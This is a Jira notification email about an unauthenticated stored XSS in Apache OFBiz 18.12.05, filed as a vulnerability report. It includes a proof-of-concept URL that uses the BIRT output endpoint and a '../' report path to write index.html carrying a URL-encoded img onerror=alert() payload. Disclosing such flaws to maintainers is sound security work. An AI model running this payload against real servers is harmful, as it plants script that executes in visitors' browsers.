[jira] [Closed] (OFBIZ-12578) Unauth Stored XSS

Nikita Podotykin (Jira) Mon, 21 Feb 2022 05:17:04 -0800


     [ 
https://issues.apache.org/jira/browse/OFBIZ-12578?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]


Nikita Podotykin closed OFBIZ-12578.
------------------------------------
    Resolution: Later

> Unauth Stored XSS
> -----------------
>
>                 Key: OFBIZ-12578
>                 URL: https://issues.apache.org/jira/browse/OFBIZ-12578
>             Project: OFBiz
>          Issue Type: Bug
>    Affects Versions: 18.12.05
>            Reporter: Nikita Podotykin
>            Priority: Major
>             Fix For: 18.12.05
>
>         Attachments: image-2022-02-21-16-04-20-703.png, 
> image-2022-02-21-16-04-53-035.png
>
>   Original Estimate: 72h
>  Remaining Estimate: 72h
>
> *Description of the vulnerability*
> *Unauth Stored XSS*
> So, let's try to create an html file in the current folder — index.html. An 
> attacker could inject
> a malicious payload and execute it using Stored XSS.
> https://192.168.0.13:8443/birt/output?__report=./../ordermgr/reports/
> SalesReport.rptdesign&__format=html&__overwrite=true&__document=index.html&reportBy=%3c%69%6d%67%20%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c
> %65%72%74%28%29%3e
> !image-2022-02-21-16-04-20-703.png!
> When accessed along the path /birt/index.html, the injected malicious load 
> will be executed.
> !image-2022-02-21-16-04-53-035.png!



--
This message was sent by Atlassian Jira
(v8.20.1#820001)

[jira] [Closed] (OFBIZ-12578) Unauth Stored XSS

Reply via email to